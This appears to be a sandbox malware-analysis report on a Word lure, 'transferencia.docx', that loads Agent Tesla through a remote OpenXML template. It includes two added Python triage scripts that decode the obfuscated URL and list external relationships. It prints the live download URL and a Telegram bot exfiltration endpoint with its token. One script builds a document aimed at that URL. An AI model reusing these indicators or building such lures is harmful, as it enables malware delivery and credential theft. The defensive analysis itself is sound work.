General
-
Target
transferencia.docx.doc
-
Size
10KB
-
Sample
230222-prryzsbd26
-
MD5
b71a4eadd0fa49510df132d011f6d736
-
SHA1
90b2734bd8f080838d401a25ed3fddec066b5c5f
-
SHA256
63d81262d8b022c5c67b24e394a32037bc0cf41869444152c48ee204d84386a3
-
SHA512
8d3c0dd8c30cabb702f012753966022bb7fb0745469c979c5f542d2c9daf0d95cbb7752fb7f3458054a4a44446dedf685e72e99bc5a6a1373561134261a56672
-
SSDEEP
192:ScIMmtP0xfUW70vG/b3kgOi4O7+us+1pReDnc378Vx6T:SPX+si10ni4O78yeDnM4VsT
Static task
static1
Behavioral task
behavioral1
Sample
transferencia.docx
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
transferencia.docx
Resource
win10v2004-20230220-en
Malware Config
Extracted
http://qquuuq9werqwqqqq00qwewerSASWERWRWIERIWERIEWIR00R0WEQQQ1QQQ99WER8W9ER9WERWKRJEWKRKWERK@3323444111/O-O-OOO.DOC
Extracted
agenttesla
https://api.telegram.org/bot5851500456:AAGR5SiDXSkn8lCoZA-eArnoTA9CuFr-jC0/
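The download URL in the extracted config uses two classic tricks: a long run of decoy text before the "@" (the URL userinfo, which HTTP clients treat as credentials rather than as the host) and a host written as a single decimal integer instead of a dotted quad. The Python below is an added example, not code from the report or the sandbox; it strips the decoy, decodes the integer host with the same arithmetic inet_aton uses, and, going beyond this one sample, also handles the hex, octal and short dotted spellings of an IPv4 address. The resolved address is computed from the value on the page, not taken from any lookup.

```python
"""Normalise an obfuscated download URL of the kind found in this sample's config."""
import ipaddress
from urllib.parse import urlsplit, urlunsplit

# Relationship target copied from the "Malware Config" section of the report above.
SAMPLE_URL = (
    "http://qquuuq9werqwqqqq00qwewerSASWERWRWIERIWERIEWIR00R0WEQQQ1QQQ99WER8W9ER9WERWKRJEWKRKWERK"
    "@3323444111/O-O-OOO.DOC"
)


def decode_host(host):
    """Turn the numeric IPv4 spellings inet_aton accepts into a dotted quad.

    Handles a single integer ("3323444111"), hex ("0xC617BB8F"), octal
    ("0306.027.0273.0217") and short dotted forms ("198.23.48015"). A host
    that is not purely numeric, e.g. a normal domain name, is returned unchanged.
    """
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return host
    values = []
    for part in parts:
        if not (part.isascii() and part.isalnum()):
            return host  # signs, underscores, empty labels: not a numeric host
        try:
            if part.lower().startswith("0x"):
                values.append(int(part[2:], 16))
            elif len(part) > 1 and part.startswith("0"):
                values.append(int(part, 8))
            else:
                values.append(int(part, 10))
        except ValueError:
            return host  # at least one label is not a number: ordinary hostname
    # inet_aton semantics: every part but the last is one byte,
    # the last part fills whatever bytes remain.
    addr = 0
    for value in values[:-1]:
        if value > 0xFF:
            return host
        addr = (addr << 8) | value
    last_bits = 8 * (5 - len(values))
    if values[-1] >= 1 << last_bits:
        return host
    addr = (addr << last_bits) | values[-1]
    return str(ipaddress.IPv4Address(addr))


def normalise(url):
    """Split a URL into what an analyst needs: decoy userinfo, real host, cleaned URL."""
    s = urlsplit(url)
    host = s.hostname or ""
    ip = decode_host(host)
    netloc = ip + (":%d" % s.port if s.port else "")
    return {
        "userinfo": s.username or "",  # text before '@'; clients treat it as credentials, not as the host
        "host": host,
        "ip": ip,
        "obfuscated": bool(s.username) or ip != host,
        "clean_url": urlunsplit((s.scheme, netloc, s.path, s.query, s.fragment)),
    }


if __name__ == "__main__":
    result = normalise(SAMPLE_URL)
    print("decoy userinfo :", result["userinfo"][:24] + "...")
    print("host as written:", result["host"])
    print("decoded address:", result["ip"])
    print("clean URL      :", result["clean_url"])
```

The clean URL is what belongs in a blocklist or a proxy log search; the raw form with the decoy prefix will not match a plain indicator lookup, and neither will the integer host unless the tool doing the lookup applies the same decoding.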
Targets
Target
transferencia.docx.doc
-
AgentTesla
Agent Tesla is an information-stealing remote access trojan (RAT) built on .NET, originally written in Visual Basic .NET; it harvests credentials and keystrokes and exfiltrates them over SMTP, FTP or, as in this sample's config, the Telegram Bot API.
-
Blocklisted process makes network request
-
Downloads MZ/PE file
-
Abuses OpenXML format to download file from external location
A relationship part inside the .docx points at an external Target (the O-O-OOO.DOC URL in the extracted config), so Word fetches it from the network when the document is opened.
-
Executes dropped EXE
-
Loads dropped DLL
-
Uses the VBS compiler for execution
-
Accesses Microsoft Outlook profiles
Outlook profile data holds saved mail account settings; reading it is a credential-harvesting step consistent with Agent Tesla's stealer functionality.
-
Looks up external IP address via web service
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory
-
Suspicious use of SetThreadContext
Setting the thread context of another process is a hallmark of process hollowing: a legitimate host process is started suspended, its image is replaced with the payload, and execution is redirected to it.
-
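The "Abuses OpenXML format" signature above comes down to one structural fact: a .docx is a zip of XML parts, and any *.rels part may carry a Relationship whose TargetMode is "External". The Python below is an added triage example, not code from the report or the sandbox. It builds a constructed minimal package (not the real sample) whose word/_rels/settings.xml.rels carries an attachedTemplate relationship aimed at the URL from the extracted config, then walks every .rels part and lists external targets; pointing external_relationships() at the bytes of a real .docx produces the same kind of listing.

```python
"""List external relationship targets (remote template, OLE, hyperlink) in an OOXML package."""
import io
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
WORD_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"

# Relationship target copied from the "Malware Config" section of the report above.
SAMPLE_TEMPLATE_URL = (
    "http://qquuuq9werqwqqqq00qwewerSASWERWRWIERIWERIEWIR00R0WEQQQ1QQQ99WER8W9ER9WERWKRJEWKRKWERK"
    "@3323444111/O-O-OOO.DOC"
)


def external_relationships(package_bytes):
    """Return every Relationship with TargetMode="External" found in any *.rels part.

    Internal relationships (no TargetMode, or "Internal") are what a normal
    document contains; an external one names a URL Word will fetch.
    """
    hits = []
    with zipfile.ZipFile(io.BytesIO(package_bytes)) as z:
        for name in z.namelist():
            if not name.lower().endswith(".rels"):
                continue
            # defusedxml is the safer parser for attacker-controlled XML; the
            # stdlib is used here only to keep the example dependency-free.
            root = ET.fromstring(z.read(name))
            for rel in root.iter("{%s}Relationship" % REL_NS):
                if (rel.get("TargetMode") or "").lower() != "external":
                    continue
                hits.append({
                    "part": name,
                    "id": rel.get("Id"),
                    # last path element of the Type URI: attachedTemplate, oleObject, hyperlink, ...
                    "type": (rel.get("Type") or "").rsplit("/", 1)[-1],
                    "target": rel.get("Target"),
                })
    return hits


def build_constructed_docx(template_url=None):
    """CONSTRUCTED minimal package for the demo, not the real sample.

    With template_url set, word/_rels/settings.xml.rels carries an external
    attachedTemplate relationship, the shape a remote-template lure uses.
    """
    rels_open = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
                 '<Relationships xmlns="%s">' % REL_NS)
    settings_rels = [rels_open]
    attached = ""
    if template_url is not None:
        settings_rels.append(
            '<Relationship Id="rId1" Type="%s/attachedTemplate" Target="%s" TargetMode="External"/>'
            % (OFFICE_REL, escape(template_url, {'"': "&quot;"}))
        )
        attached = '<w:attachedTemplate r:id="rId1"/>'
    settings_rels.append("</Relationships>")
    document_rels = (rels_open
                     + '<Relationship Id="rId1" Type="%s/settings" Target="settings.xml"/>' % OFFICE_REL
                     + "</Relationships>")
    package_rels = (rels_open
                    + '<Relationship Id="rId1" Type="%s/officeDocument" Target="word/document.xml"/>' % OFFICE_REL
                    + "</Relationships>")
    settings_xml = ('<w:settings xmlns:w="%s" xmlns:r="%s">%s</w:settings>'
                    % (WORD_NS, OFFICE_REL, attached))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("_rels/.rels", package_rels)
        z.writestr("word/document.xml", '<w:document xmlns:w="%s"><w:body/></w:document>' % WORD_NS)
        z.writestr("word/_rels/document.xml.rels", document_rels)
        z.writestr("word/settings.xml", settings_xml)
        z.writestr("word/_rels/settings.xml.rels", "\n".join(settings_rels))
    return buf.getvalue()


if __name__ == "__main__":
    for hit in external_relationships(build_constructed_docx(SAMPLE_TEMPLATE_URL)):
        print("%s  %s  %s -> %s" % (hit["part"], hit["id"], hit["type"], hit["target"]))
```

An attachedTemplate relationship with an external target is rarely legitimate in mail-borne documents and is a cheap, static check to run before any detonation; the same walk also surfaces external oleObject and frame targets, which are the other common remote-loading shapes.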